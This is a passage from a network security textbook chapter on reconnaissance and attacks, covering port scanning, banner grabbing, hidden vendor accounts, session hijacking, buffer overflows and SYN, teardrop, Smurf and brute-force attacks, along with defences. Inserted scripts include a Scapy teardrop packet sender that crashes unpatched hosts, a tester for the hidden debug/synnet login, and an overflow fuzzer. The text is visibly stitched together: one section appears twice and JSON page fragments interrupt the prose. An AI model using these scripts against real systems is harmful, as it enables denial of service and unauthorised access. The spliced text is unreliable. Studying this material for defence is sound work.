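Here is a minimal sketch of such a homespun Ping scanner in Bourne shell, using the chapter's example subnet. It assumes a ping that accepts a count option (-c) and a seq utility; flags and timeouts differ between platforms, so treat this as a starting point rather than a finished tool:

#!/bin/sh
# Homespun Ping scanner: probe every address on 64.36.56.0/24
# and log the ones that answer.
for i in `seq 1 254`
do
    if ping -c 1 64.36.56.$i > /dev/null 2>&1
    then
        echo "64.36.56.$i is alive" >> alive.lst
    fi
done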
Port Scanning

A port scanner allows you to sequentially probe a number of ports on a target system to see whether there is a service listening. Think of a burglar walking through an apartment building and jiggling all the doorknobs to see if one is unlocked, and you will get the idea. A port scanner simply identifies which well-known service ports are listening for connection requests.

Figure 16.5 shows the results of a scan against the system 64.36.56.59 using iNetTools. As you can see, iNetTools has identified a number of open ports on this system. Notice that the list of open ports reveals the functionality of the system, which in this case is acting as an FTP, mail, DNS, and Web server.

Figure 16.5: A port scan of a system

Exactly how does a port scanner work? This is shown in Figure 16.6. If you look at packet 35, the port scanner initiates a TCP three-packet handshake with a machine named Thor, transmitting a packet with a flag setting of SYN=1 to destination port 23 (telnet). In packet 36, Thor replies with SYN=1, ACK=1. From this response, the port scanner knows that a service is listening on the telnet port. In packet 37, the scanner completes the three-packet handshake by transmitting ACK=1. The scanner then immediately ends the session in packet 38 by transmitting ACK=1, FIN=1, and in packet 39 Thor acknowledges this request by transmitting ACK=1.

Figure 16.6: An analyzer trace of a TCP port scan

The scanner knew that Thor was listening on port 23 because it was able to complete a full TCP three-packet handshake with the system. To see what happens when a service is not active, refer back to Figure 16.6, but this time look at packets 55, 56, and 57. In these three transmissions, the scanner probes Thor on ports 22, 26, and 24, respectively, to see if a service is listening. In packets 58, 59, and 60, Thor replies with ACK=1, RST=1. This is a target system's way of letting the source know that there is no service available on that port. By sorting through the different responses, a port scanner can accurately log which ports have active services.

Port scanning has a few shortcomings. The first is that the connection attempt will almost certainly be logged by the target system, giving the system administrator a record that a port scan has taken place. The second is that port scanning can easily be filtered out by any packet filter or firewall, because the port scanner relies on the initial connection packet with SYN=1.
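You do not need a graphical tool to perform the basic full-connect scan just described. Here is a minimal sketch using the netcat (nc) utility, where available; Thor and the port range are the chapter's examples, and option letters vary between netcat versions:

# Scan TCP ports 20 through 30 on thor without sending any data.
# -z: report listening ports without completing a data session
# -v: print a result line for each port
nc -v -z thor 20-30

Like the graphical scanners, this completes (or attempts) a full TCP handshake, so the probes are subject to the same logging and filtering limitations discussed above.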
TCP Half Scanning

TCP half scanning was developed to get around the logging issue. A TCP half scan does not try to establish a full TCP connection; the half scanner transmits only the initial SYN=1 packet. If the target system responds with SYN=1, ACK=1, the half scanner knows that the port is listening and immediately transmits RST=1 to tear down the connection. Since a full connection is never actually established, most (but not all) systems will not log this scan. Because a TCP half scan still relies on the initial SYN=1 packet, however, it can be blocked by a packet filter or firewall, just like a full scan.

FIN Scanning

The final type of scanner is known as a FIN scanner. A FIN scanner does not transmit a SYN=1 packet in an attempt to establish a connection. Rather, it transmits a packet with ACK=1, FIN=1. If you refer back to packet 38 in Figure 16.6, you will remember that these are the flags used to tear down a TCP connection. In effect, the FIN scanner is telling the target system that it wishes to tear down a connection, even though no connection exists.

Note
How the target system responds is actually kind of interesting (to a bit weenie, anyway). If the target port does not have a service listening, the system responds with the standard ACK=1, RST=1. If there is a service listening, however, the target system simply ignores the request, because there is no connection for it to tear down. By sorting through which ports elicit a response and which do not, a FIN scanner can determine which ports are active on the target system.

What makes this type of scanner even more lethal is that neither a static packet filter nor many firewalls will block this type of scan. This allows an attacker to identify systems even if they are on the other side of a firewall.

FIN scanning does not work on every type of system. For example, a Microsoft TCP stack responds with ACK=1, RST=1 even if the port is active. While this means that Microsoft's TCP stack does not comply with RFC 793, it also means that you cannot use a FIN scanner against a Windows system to identify active ports, because it will appear that none of the system's ports has an active service. The ACK=1, RST=1 response will still inform the attacker that a system is present, however, and that it is some form of Microsoft operating system.

Passive Monitoring

In order to collect more information about your network, an attacker may attempt to monitor traffic. This can be accomplished by directly installing an analyzer on your network or, more subtly, by coaxing your internal systems into identifying themselves. You have already seen what an attacker can learn by installing a network analyzer to monitor traffic flow. In this section, we will look at one of the more subtle methods an attacker can use to collect information about your internal systems.

For example, review the packet capture in Figure 16.7, which shows a standard HTTP data request sent by a client to a Web server. If Woolly Attacker can get some of your internal users to connect to his Web site (perhaps through an enticing e-mail), he has the opportunity to collect a wealth of information. Starting at about halfway through the packet capture, our Web client is telling the remote Web server several things:

• The preferred language is English.
• The system is running at 800 × 600 resolution.
• The video card supports 16 million colors.
• The operating system is Windows 95.
• The system uses an x86 processor.
• The browser is Microsoft Internet Explorer version 3.0.

Figure 16.7: An HTTP data request

The last three pieces of information are the most interesting. Woolly now knows that if he wishes to attack this system, he needs to focus on exploits that apply to an x86 system running Windows 95 and Internet Explorer 3.0. As you will see later in this chapter, many of these can be launched simply by having an IE user download a Web page.

One of the reasons proxy firewalls are so popular is that most of them filter out information regarding operating system and browser type. This puts an attacker in a hit-or-miss position: the exploit may or may not work on the target system.

Note
The less information you unknowingly hand out about your network, the harder it will be for an attacker to compromise your resources.

Checking for Vulnerabilities

Now that Woolly has an inventory of all systems on the network and knows which services are running on each, he can turn his attention to finding out which vulnerabilities can be exploited. This can be done in hit-or-miss fashion by simply launching an exploit to see what happens. A dangerous attacker, however, will take the time to confirm that an exploit will work before trying it. This helps to ensure that the attacker does not set off some kind of alarm while bumping around in the dark. Vulnerability checks can be performed manually or automatically through some form of software product.

Manual Vulnerability Checks

Manual vulnerability checks are performed by using a tool, such as telnet, to connect to a remote service and see what is listening. Most services do a pretty good job of identifying themselves when a remote host connects to them.
Checking for Vulnerabilities

Now that Woolly has an inventory of all systems on the network and knows what services are running on each, he can turn his attention to finding out which vulnerabilities can be exploited. This can be done in a hit-or-miss fashion by simply launching an exploit to see what happens. A dangerous attacker, however, will take the time required to know that an exploit will work before trying it. This helps to insure that the attacker does not set off some kind of alarm while bumping around in the dark. Vulnerability checks can be performed manually or automatically through some form of software product.

Manual Vulnerability Checks

Manual vulnerability checks are performed by using a tool, such as telnet, to connect to a remote service and see what is listening. Most services do a pretty good job of identifying themselves when a remote host connects to them. While this is done for troubleshooting purposes, it can provide an attacker with more information than you intended to give out.

For example, take a look at Figure 16.8. We have opened a telnet session to the SMTP port on mailsys.foobar.org. This was accomplished by typing the following command at a system prompt:

telnet mailsys.foobar.org 25

Figure 16.8: Using telnet to connect to a remote mail server

The trailing 25 tells telnet not to connect to the default port of 23; rather, it should connect to port 25, which is the well-known port for SMTP. As you can see, this mail server is more than happy to let us know that it is running Microsoft Exchange (thus the OS is Windows NT) and that the software version is 5.0. The build number of 1457.7 tells us that there are no Exchange service packs installed; this build is the original 5.0 version. An attacker looking to disable this system now knows to look for vulnerabilities that pertain to Exchange 5.0. Table 16.1 shows a number of commands you can use when connecting to a service port via telnet.

Table 16.1: Service Port Commands When Using Telnet

Service   Port   Commands                                      Comments
FTP       21     user, pass, stat, quit                        Provides a command session only; you cannot transfer a file.
SMTP      25     helo, mail from:, rcpt to:, data, quit        E-mail can be forged using these commands.
HTTP      80     get                                           You will receive a page error, but you will at least know the service is active.
POP3      110    user, pass, stat, list, retr, quit            Mail can be viewed by connecting to the POP3 port.
IMAP4     143    login, capability, examine, expunge, logout   All commands must be preceded by a unique line identifier.

Figure 16.9 shows telnet being used to connect to a remote server named Thor that is running IMAP4. Notice that IMAP4, like many of the other services we discussed, sends passwords in the clear (2secret2 is the password for the user cbrenton). Also notice that IMAP4 expects each command from the client to be preceded by a line identifier (such as the 1, 2, 3 used in the figure). As with Figure 16.8, we now know what software is answering queries on this port. This helps us to identify which exploits may be effective against this system.

Figure 16.9: Using telnet to connect to a remote IMAP4 server

Clearly, manual vulnerability checking takes a bit of work. It is time-consuming because it requires manual intervention in order to verify the target service. Manual vulnerability checking also requires that attackers have at least half a clue about what they are doing. Knowing which service is running on the target system is of little help to an attacker who cannot figure out how to exploit this information.
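The telnet checks in Table 16.1 are also easy to script. The fragment below, a rough sketch of my own using the host name from Figure 16.8, collects the greeting banner from several of the services listed in the table without requiring an interactive session.

import socket

def grab_banner(host, port, timeout=3):
    # Connect to a service port and return whatever the service announces.
    try:
        s = socket.create_connection((host, port), timeout=timeout)
        banner = s.recv(1024).decode(errors="replace").strip()
        s.close()
        return banner
    except OSError:
        return None

for port in (21, 25, 110, 143):
    banner = grab_banner("mailsys.foobar.org", port)
    if banner:
        print(port, banner)

Note that HTTP (port 80) is left out of the loop: a Web server announces nothing until it receives a request, which is why Table 16.1 lists the get command for that port.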
Automated Vulnerability Scanners

An automated vulnerability scanner is simply a software program that performs all the probing and scanning steps an attacker would normally do manually. These scanners can be directed at a single system or at entire IP subnets. The scanner will first go out and identify potential targets. It will then perform a port scan and probe all active ports for known vulnerabilities. These vulnerabilities are then reported back to the user. Depending on the program, the vulnerability scanner may even include tools to actually exploit the vulnerabilities that it finds.

For example, Figure 16.10 is a screen capture of the Security Analyzer from WebTrends. By defining an IP subnet range, this scanner will go out and find all active systems on that subnet. It will then perform a port scan and report any vulnerabilities that may exist. The program even includes an Ethernet sniffer so that traffic along the local subnet may be monitored. As you can see from the screen capture, Security Analyzer has identified some potential vulnerabilities on ports 21 and 25 of the system at IP address 192.168.1.200.

Figure 16.10: The Security Analyzer from WebTrends

Vulnerability scanners are not some mystical piece of software that can magically infiltrate a system and identify problems. They simply take the manual process of identifying potential vulnerabilities and automate it. In fact, an experienced attacker or hacker performing a manual vulnerability check is far more likely to find potential problems, because she is in a better position to adapt to the characteristics of each specific system. A vulnerability scanner is no better at performing a security audit than whoever programmed it.

Warning
Beware of security experts who make their living by strictly running automated vulnerability software. Most will provide the canned reports created by the software package and little extra value. I've run into more than one so-called expert who did not even understand the output of the reports they were producing. Ask for references before contracting with anyone to perform a security audit.

It is impossible for a remote vulnerability scanner to identify all exploits without actually launching them against the remote system. For example, you cannot tell whether a remote system is susceptible to a teardrop attack without actually launching the attack to see if the system survives. This means that you should not assume that a system has a clean bill of health just because a remote vulnerability scanner does not identify any specific problems.

It is possible for a vulnerability scanner to identify exploits without having to launch them when the software is running on the system that you wish to check, or when it has full access to the file system. A software program running locally has the benefit of being able to check application and driver dates and compare these to a list of known fixes. For example, a vulnerability scanner running on an NT server would be able to verify that tcpip.sys is dated 1/9/98 or later. This would indicate a patched driver, which is not susceptible to any known teardrop attacks.

Vulnerability scanners are simply a tool; they are not a magic bullet for finding all known security problems. While vulnerability scanners are fine for providing some initial direction about which systems are in the most need of attention, they should not be considered a final authority on which systems are secure and which ones are not. There is no tool that can replace an experienced administrator who stays informed of security issues and has an intimate understanding of the systems he manages.
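As a rough illustration of what such a scanner automates, the sketch below sweeps a subnet, grabs SMTP banners, and flags any that match a known-vulnerable version string. It is mine rather than any real product's logic, and the signature list is invented for the example.

import socket

# Hypothetical signature list mapping a banner substring to an advisory note
KNOWN_BAD = {
    "Microsoft Exchange Internet Mail Service 5.0": "unpatched Exchange 5.0",
}

def check_host(ip):
    try:
        s = socket.create_connection((ip, 25), timeout=1)
        banner = s.recv(512).decode(errors="replace")
        s.close()
    except OSError:
        return
    for signature, note in KNOWN_BAD.items():
        if signature in banner:
            print(ip, "->", note)

for host_id in range(1, 255):
    check_host("192.168.1.%d" % host_id)

As the text cautions, a match here means only that the banner looks vulnerable; confirming that the hole is actually exploitable, without launching the exploit, is often impossible.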
Launching the Attack

Once Woolly Attacker knows your weak spots, he is ready to launch an attack. The type of attack he launches will depend greatly on his final objectives. Is he after one specific resource, or does he want to go after all systems on the network? Does he wish to penetrate a system, or will a denial of service suffice? The answers to these questions will decide his next course of action.

In this section, we will look at a number of different exploits. The intent is not to give a listing of all known exploits—any such list would be out of date before this book even went to print. Rather, the goal is to show you a selective sampling of the exploits found in the wild so that you can better understand what can and cannot be done when attacking a target system or network. The idea is to make you aware of the types of attacks that can be launched—so that you will be better able to determine whether a particular resource is safe.

Note
Some exploits that were briefly described earlier in this book have been included here for completeness.

Hidden Accounts

While not an exploit per se, hidden user accounts can completely circumvent a security policy. For example, let's say you have a border router that is protecting your network by providing packet filtering. Imagine the security breach of having that device contain a hidden, administrator-level account with a password that cannot be changed. Far-fetched, you say? Try telling that to 3COM.

In the spring of 1998, it came to light that 3COM was configuring layer-2 and -3 switches within its CoreBuilder and SuperStack II product line with hidden administrator accounts. The authentication pair used for most of these devices was a logon name of debug with a password of synnet. This administrator-level account could not be changed or deleted and was not visible from the management software. This meant that you could take all the right steps to secure your network hardware—only to have an attacker come in through the back door.

In 3COM's defense, it was not the first vendor to hide accounts within its firmware, nor will it likely be the last. A number of other hardware vendors have done the same, citing support issues as the primary motivating force. These firms reason that, by including a hidden administrator account, a technical-support person would be able to help a user who has forgotten the administrator password on the visible account. Many vendors, such as Cisco, have taken a more secure approach to handling such problems. For example, if you forget the password to your Cisco router, it can still be recovered, but you need physical access to the device and you must take it offline during the recovery process. This provides a far more secure method of password recovery.

Tip
Unless a vendor has made a statement to the contrary, it is impossible to know which network devices have hidden administrator accounts. This means that you should not rely solely on password authentication; rather, you should take additional measures in order to secure these devices. For example, you may wish to consider disabling remote management of the device altogether or limiting management access to only certain IP addresses.
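One way to audit your own gear for this class of problem is to try published default and hidden credential pairs against each device's management interface. The sketch below is a hedged example of mine using Python's telnetlib module (long part of the standard library, though removed from the newest releases); the prompt strings and management address are assumptions you would adapt to your own devices, and it should be pointed only at equipment you are responsible for.

import telnetlib

# Published pairs worth testing; debug/synnet is the 3COM example above
DEFAULT_CREDENTIALS = [("debug", "synnet"), ("admin", "admin")]

def try_login(host, user, password):
    # Return True if the device accepts this credential pair.
    tn = telnetlib.Telnet(host, 23, timeout=5)
    tn.read_until(b"Login:")            # assumed prompt; adjust per device
    tn.write(user.encode() + b"\n")
    tn.read_until(b"Password:")
    tn.write(password.encode() + b"\n")
    response = tn.read_until(b">", timeout=3)
    tn.close()
    return b">" in response             # crude check for a command prompt

for user, password in DEFAULT_CREDENTIALS:
    if try_login("192.168.1.1", user, password):
        print("WARNING: %s/%s accepted" % (user, password))

A hit means the device needs a firmware update or, at minimum, the compensating access controls described in the Tip above.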
\nMan in the Middle \nThe classic man-in-the-middle exploit is to have an attacker sitting between the client and the server with a packet \nanalyzer. This is the variation that most people think of when they hear the term “man in the middle.” There are, in \nfact, many other forms of man-in-the-middle attacks, which exploit the fact that most network communications do \nnot use a strong form of authentication. Unless both ends of the session frequently verify whom they are talking to, \nthey may very well be communicating with an attacker, not the intended system. \nStepping in on a conversation is typically referred to as session hijacking. An attacker waits for two systems to \nbegin a legitimate communication session and then injects commands into this data stream, pretending to be one of \nthe communicating systems. Session hijacking tools have been available for NetWare for some time. There are \ntools that allow any user to hijack the supervisor’s communication session and promote his or her own logon ID to \na supervisor equivalent. In the summer of 1997, a similar tool was released for Windows NT environments, called \nC2MYAZZ. \nC2MYAZZ \nThe C2MYAZZ utility is an excellent example of using spoofing in order to hijack a communication session. \nWhen Windows 95 and NT were originally introduced, they included two methods of authenticating with a \nSession Message Block (SMB) system. The default was to authenticate using an encrypted password. This was the \npreferred method for authenticating with a Windows NT domain. LanMan authentication was also included, \nhowever, for backwards compatibility with SMB LanMan servers. LanMan authentication requires that the logon \nname and password be sent in the clear. \n" }, { "page_number": 347, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 347\nWhen C2MYAZZ is run, it passively waits for a client to authenticate to the NT server. When a logon is detected, \nC2MYAZZ transmits a single packet back to the client, requesting that LanMan authentication be used instead. \nThe client, trusting that the server is sending the request, happily obliges and retransmits the credentials in the \nclear. The C2MYAZZ utility would then capture and display the logon name and password combination. \nC2MYAZZ causes no disruption in the client’s session, because the user can still log on and gain system access. \nA packet capture of C2MYAZZ in action is shown in Figure 16.11. A client establishes a connection with an NT \ndomain controller named FirstFoo by initializing a TCP three-packet handshake. In packet 6, the client informs the \nserver that it wishes to authenticate to the domain. Packet 7 is where things start to get interesting. Notice that \nC2MYAZZ has transmitted a packet back to the client. The source IP address used by C2MYAZZ (192.168.1.1) is \nthat of the server FirstFoo. All acknowledgment and sequence numbers are spoofed, as well, so that the client \nassumes that it has received this packet from the server FirstFoo. The bottom window is the data being transmitted \nby C2MYAZZ that tells the client to use clear text authentication. \nIn packet 8, the domain controller FirstFoo responds, telling the client that encryption is supported—but at this \npoint it is too late. The client has already received the spoofed packet from C2MYAZZ, so the client assumes that \nthe real transmission from FirstFoo must be a duplicate and discards the information. The client then proceeds to \nuse clear text authentication. 
The C2MYAZZ utility is then free to document the logon name and password, as both have been transmitted in the clear.

Figure 16.11: A packet capture of C2MYAZZ telling a client to use clear text passwords

Note
What is interesting about this exploit is that if both the server and the client are unpatched, there is no interruption in connectivity. The client authenticates to the server and receives access to network resources. Microsoft has made two patches available for this exploit: one patch gets loaded on all clients, and the other gets loaded on the server. If you load the client patch, the client will refuse to send logon information in the clear. If the server patch is loaded, the server will not accept clear text logons; the client may still transmit clear text authentication information, but the server will not accept those credentials. This means that unless you patch every single system, C2MYAZZ becomes an effective tool for causing a denial of service, because unpatched clients will no longer be able to authenticate with the domain.

The reason that C2MYAZZ is so effective is that neither the client nor the server makes any effort to authenticate the remote system. Since the client accepts the spoofed packet as legitimate, C2MYAZZ is free to hijack the session. The Microsoft response to this problem—which is to stop using clear text authentication information—is simply a patch, not a true fix. Since this patch does not add authentication, the SMB session is still vulnerable to hijacking attacks. As mentioned, this attack is a variation of an old NetWare attack that allowed users to hijack a supervisor's session and promote themselves to a supervisor equivalent. This is what prompted Novell to create packet signature.

Packet signature is an authentication process that allows the NetWare server and client to validate each other's identity during the course of a communication session. When the server receives a packet of data from the client, the signature information is referenced in order to insure that the transmission source is legitimate. The problem with packet signature is that, by default, clients and servers are configured not to use it unless signing is requested by the other system. This means that packet signature as a method of authentication is not used by default. Even if a client setting is changed so that it requests packet signature, it is far too easy to use a utility similar to C2MYAZZ to inform the client that packet signature is not supported.

Tip
The only way to insure that packet signature is used is to set packet signing to the highest setting. This prevents the client from talking to any server that does not support packet signature.

Buffer Overflows

When a programmer writes an application, she must create memory pools, referred to as buffers, in order to accept input from users or other applications. For example, a login application must allocate memory space in order to allow the user to input a logon name and password. In order to allocate enough memory space for this information, the programmer must make an assumption about how much data will be received for each variable. For example, the programmer may decide that users will not need to enter a logon name larger than 16 characters and that passwords will never be larger than 10 characters.
A buffer overflow occurs when a process receives more data than the programmer ever expected it to see, and no contingency exists for handling the excess.

An Example of a Buffer Overflow

For an example of how buffer overflows are used as exploits, let's return to our example in Figure 16.8, where we had established a session with an Exchange server using telnet. If we take a quick trip to www.rootshell.com and do a search for known vulnerabilities of Exchange, we find that this version of Exchange is susceptible to a buffer overflow attack.

If you use an LDAP bind request (consisting of a username, password, and binding method) and pad the bind method with more than 254 characters, the LDAP service will crash, and a hacker could execute code. This is because when the LDAP connector was coded, the programmers assumed that allocating enough memory space to handle a binding method containing 254 characters was more than sufficient. While it may have seemed safe to assume that a binding method greater than 254 characters would never exist, the problem is that the programmers never told the application what to do if it actually received one. Instead of truncating the data or rejecting it outright, the LDAP connector will still attempt to copy the long value into a memory space that can only handle 254 characters. The result is that the characters after character number 254 will overwrite other memory areas or get passed off to the core OS for processing. If you are lucky, this causes the server to crash. If you are not so lucky, the remaining characters can be interpreted as instructions for the operating system and will be executed with the level of permissions granted to that service. This is why running services as root or administrator is considered so dangerous: if Woolly Attacker can cause a buffer overflow, he may be able to execute any command he wants on the target system.

Other Buffer Overflow Attacks

Buffer overflows have become the most popular way to cause a denial of service or to attempt to execute commands on a remote system. There are many exploits that rely on sending a process too much information in order to attack the target system. Some of the more popular buffer overflow attacks over the last few years have been
• Sending oversized ICMP request packets (Ping of death)
• Sending an IIS 3.0 server a 4,048-byte URL request
• Sending e-mail messages with 256-character filename attachments to Netscape and Microsoft mail clients
• Sending an SMB logon request to an NT server with the data size incorrectly identified
• Sending a Pine user an e-mail with a from address in excess of 256 characters
• Connecting to WinGate's POP3 port and entering a username with 256 characters

As you can see, buffer overflow problems exist across a wide range of applications and affect every operating system.

Note
You may be able to find a buffer overflow problem through trial and error, but failing to produce a buffer overflow does not mean that the software is secure. You simply might not have tried enough characters. The only surefire method of verifying that a program is not susceptible to buffer overflows is to review the original source code.
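A crude way to hunt for this class of problem in your own services is to feed a protocol field progressively longer strings and watch for the service to stop responding. The following sketch is my illustration, not a tool from the text; the target host is hypothetical, and a probe like this belongs only on a test system, since a hit generally crashes the service.

import socket

def probe_field(host, port, prefix, lengths):
    # Send one oversized command per connection; report when the service dies.
    for length in lengths:
        payload = prefix + b"A" * length + b"\r\n"
        try:
            s = socket.create_connection((host, port), timeout=5)
            s.recv(512)        # swallow the greeting banner
            s.sendall(payload)
            s.recv(512)        # a healthy service still answers
            s.close()
        except OSError:
            print("Service stopped responding at %d characters" % length)
            return

# Example: oversized HELO arguments against a test SMTP server
probe_field("testbox.foobar.org", 25, b"HELO ", [64, 128, 256, 512, 1024])

As the Note above stresses, a clean run proves nothing: failing to produce an overflow may simply mean you have not tried the right field or enough characters.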
\nSYN Attack \nA SYN attack exploits the use of a small buffer space during the TCP three-packet handshake in order to prevent a \nserver from accepting inbound TCP connections. When the server receives the first SYN=1 packet, it stores this \nconnection request in a small “in-process” queue. Since sessions tend to be established rather quickly, this queue is \nsmall and only able to store a relatively low number of connection requests. This was done for memory \n" }, { "page_number": 349, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 349\noptimization, in the belief that the session would be moved to the larger queue rather quickly, thus making room \nfor more connection requests. \nA SYN attack floods this smaller queue with connection requests. When the destination system issues a reply, the \nattacking system does not respond. This leaves the connection request in the smaller queue until the timer expires \nand the entry is purged. By filling up this queue with bogus connection requests, the attacking system can prevent \nthe system from accepting legitimate connection requests. Thus a SYN attack is considered a denial of service. \nSince the use of two memory spaces is a standard TCP function, there is no way to actually fix this problem. Your \ntwo options are \nƒ \nTo increase the size of the in-process queue \nƒ \nTo decrease the amount of time before stale entries are purged from the in-process queue \nIncreasing the queue size provides additional space so that additional connection requests can be queued, but you \nwould need an extremely large buffer to insure that systems connected to a 100Mb or 1Gb network would not be \nvulnerable to a SYN attack. For systems connected to slower network connections, this use of memory would be a \ncomplete waste. As for decreasing the time before connection requests are purged, a timer value that is set too low \nwould prevent busy systems or systems connected by a slow network link to be refused a connection. \nTuning a system so that it cannot fall prey to a SYN attack becomes a balancing act. You want to increase the in-\nprocess queue in order to handle a reasonable number of concurrent connection requests without making the buffer \nso large that you are wasting memory. You also want a purge time that is low enough to remove stale entries but \nnot so low that you start preventing legitimate systems from establishing a connection. Unfortunately, most \noperating systems do not allow you to tune these values. You must rely on the operating system vendor to pick \nappropriate settings. \nTeardrop Attacks \nIn order to understand how a teardrop attack is used against a system, you must first understand the purpose of the \nfragmentation offset field and the length field within the IP header. The fragmentation offset field is typically used \nby routers. If a router receives a packet that is too large for the next segment, the router will need to fragment the \ndata before passing it along. The fragmentation offset field is used along with the length field so that the receiving \nsystem can reassemble the datagram in the correct order. When a fragmentation offset value of 0 is received, the \nreceiving system assumes either that this is the first packet of fragmented information or that fragmentation has \nnot been used. \nIf fragmentation has occurred, the receiving system will use the offset to determine where the data within each \npacket should be placed when rebuilding the datagram. 
For an analogy, think of a child's set of numbered building blocks. As long as the child follows the numbering plan and puts the blocks together in the right order, he can build a house, a car, or even a plane. In fact, he does not even need to know what he is trying to build; he simply has to assemble the blocks in the specified order.

The IP fragmentation offset works in much the same manner. The offset tells the receiving system how far away from the front of the datagram the included payload should be placed. If all goes well, this scheme allows the datagram to be reassembled in the correct order. The length field is used as a verification check to insure that there is no overlap and that data has not been corrupted in transit. For example, if you place fragments 1 and 3 within the datagram and then try to place fragment 2, but you find that fragment 2 is too large and will overwrite some of fragment 3, you know you have a problem.

At this point, the system will try to realign the fragments to see if it can make them fit. If it cannot, the receiving system will send out a request that the data be resent. Most IP stacks are capable of dealing with overlaps or payloads that are too large for their segment.

Launching a Teardrop Attack

A teardrop attack starts by sending a normal packet of data with a normal-size payload and a fragmentation offset of 0. From the initial packet of data, a teardrop attack is indistinguishable from a normal data transfer. Subsequent packets, however, have modified fragmentation offset and length fields. This ensuing traffic is responsible for crashing the target system.

When the second packet of data is received, the fragmentation offset is consulted to see where within the datagram this information should be placed. In a teardrop attack, the offset on the second packet claims that this information should be placed somewhere within the first fragment. When the payload field is checked, the receiving system finds that this data is not even large enough to extend past the end of the first fragment. In other words, this second fragment does not overlap the first fragment; it is actually fully contained inside of it. Since this was not an error condition that anyone expected, there is no routine to handle it, and this information causes a buffer overflow—crashing the receiving system. For some operating systems, only one malformed packet is required. Others will not crash unless multiple malformed packets are received.
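To make the field manipulation concrete, here is a sketch using the Scapy packet library. It is my illustration rather than the original teardrop code, the target address is a hypothetical lab machine, and it should never be aimed at a system you do not own; a patched IP stack will simply discard the pair. The two fragments share an IP ID, and the second fragment's offset and length place it entirely inside the first, which is the malformed condition described above.

from scapy.all import IP, UDP, Raw, send

target = "192.168.1.250"  # hypothetical lab machine

# Fragment 1: offset 0, more-fragments flag set,
# carrying an 8-byte UDP header plus 16 bytes of payload
first = IP(dst=target, id=42, flags="MF", frag=0) / UDP(sport=1025, dport=7) / Raw(b"A" * 16)

# Fragment 2: an offset of 1 (Scapy counts in 8-byte units) lands inside
# fragment 1, and the 4-byte payload is too short to extend past its end
second = IP(dst=target, id=42, flags=0, frag=1, proto=17) / Raw(b"B" * 4)

send([first, second])

Against an unpatched stack, reassembling these two fragments triggers exactly the unhandled fully-contained-fragment condition that crashes the receiving system.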
\nI’m sure you can see what happens next. All the hosts on that segment respond with an echo-reply to the spoofed \nIP address. If this is a large Ethernet segment, there may be 500 or more hosts responding to each echo request \nthey receive. \nSince most systems try to handle ICMP traffic as quickly as possible, the target system whose address Woolly \nAttacker spoofed quickly becomes saturated with echo replies. This can easily prevent the system from being able \nto handle any other traffic, thus causing a denial of service. \nThis not only affects the target system, but the organization’s Internet link, as well. If the bounce site has a T3 link \n(45Mbps) but the target system’s organization is hooked up to a leased line (56Kbps), all communication to and \nfrom the organization will grind to a halt. \nSo how can you prevent this type of attack? You can take steps at the source site, bounce site, and target site to \nhelp limit the effects of a Smurf attack. \nBlocking Smurf at the Source \nSmurf relies on the attacker’s ability to transmit an echo request with a spoofed source address. You can stop this \nattack at its source by using router access lists, which insure that all traffic originating from your network does in \nfact have a proper source address. This prevents the spoofed packet from ever making it to the bounce site. \nBlocking Smurf at the Bounce Site \nIn order to block Smurf at the bounce site, you have two options. The first is to simply block all inbound echo \nrequests. This will prevent these packets from ever reaching your network. \nIf blocking all inbound echo requests is not an option, then you need to stop your routers from mapping traffic \ndestined for the network broadcast address to the LAN broadcast address. By preventing this mapping, your \nsystems will no longer receive these echo requests. \nTo prevent a Cisco router from mapping network broadcasts to LAN broadcasts, enter configuration mode for the \nLAN interface and enter the command \nno ip directed-broadcast \nNote \nThis must be performed on every LAN interface on every router. This command will not \nbe effective if it is performed only on your perimeter router. \nBlocking Smurf at the Target Site \nUnless your ISP is willing to help you out, there is little you can do to prevent the effects of Smurf on your WAN \nlink. While you can block this traffic at the network perimeter, this is too late to prevent the attack from eating up \nall of your WAN bandwidth. \nYou can, however, minimize the effects of Smurf by at least blocking it at the perimeter. By using dynamic packet \nfiltering or some form of firewall that can maintain state, you can prevent these packets from entering your \nnetwork. Since your state table would be aware that the attack session did not originate on the local network (it \n" }, { "page_number": 351, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 351\nwould not have a table entry showing the original echo request), this attack would be handled like any other spoof \nattack and promptly dropped. \nBrute Force Attacks \nA brute force attack is simply an attempt to try all possible values when attempting to authenticate with a system \nor crack the crypto key used to create ciphertext. For example, an attacker may attempt to log on to your server as \nadministrator using a list of dictionary words as possible passwords. 
There is no finesse involved; the attacker is simply going to try every potential word or phrase to come up with a possible password.

One of the most popular ways to perform a brute force attack is with a password cracker, and no program demonstrates how effective these tools can be better than Security Software Technologies' L0phtCrack (developed by L0pht, which later became part of @stake). L0phtCrack uses both a dictionary file and a brute force guessing attack in order to discover user passwords. Figure 16.12 is a screen capture of L0phtCrack attempting to crack a number of user passwords. This particular session has just been started; notice that several passwords have already been cracked.

Figure 16.12: L0pht's L0phtCrack utility

Encrypted NT passwords are saved in the \WinNT\system32\config directory in a file named SAM. L0phtCrack provides three ways to access this information:
• By directly importing them into L0phtCrack if the software is running on the NT server
• By reading a backup version of the SAM file saved to tape, an emergency recovery disk, or the \WinNT\repair directory
• By sniffing them off the network using the included readsmb.exe utility

Once the authentication information has been collected, it is imported into the L0phtCrack utility. Unlike some password crackers that attempt to crack the entire ciphertext, L0phtCrack takes a few shortcuts in order to reduce the time required to crack passwords. For example, if you look at Figure 16.12, the <8 column indicates accounts with a password of fewer than eight characters. This is determined by looking at the ciphertext in the LanMan hash: any password that contains fewer than eight characters will always have the string AAD3B435B51404EE appended to the end for padding. This allows L0phtCrack to quickly determine that the password string contains fewer than eight characters.

The passwords are first checked against a dictionary file with thousands of words. This dictionary file can be edited with any text editor if the user wishes to add more words. Dictionary checking is extremely fast—checking the accounts shown in Figure 16.12 took less than 10 seconds. Any passwords that are not cracked by the dictionary search are then subjected to a brute force attack, which is capable of testing both alphanumeric and special characters. The amount of time it takes to brute force a password depends on the number of characters it contains. For example, the account cbrenton in Figure 16.12 has a 10-character password. Had this password been seven characters or less, the search time would have been reduced by roughly one-third.

As system administrator, you simply cannot control the use of password crackers: they are available for every platform. While you may be able to prevent an attacker from running a password cracker directly on your server, she can always run the cracking software on some other machine. This means your only true defense is to protect any files that include password information, as well as to prevent sniffing on your network through the use of routers and switches.
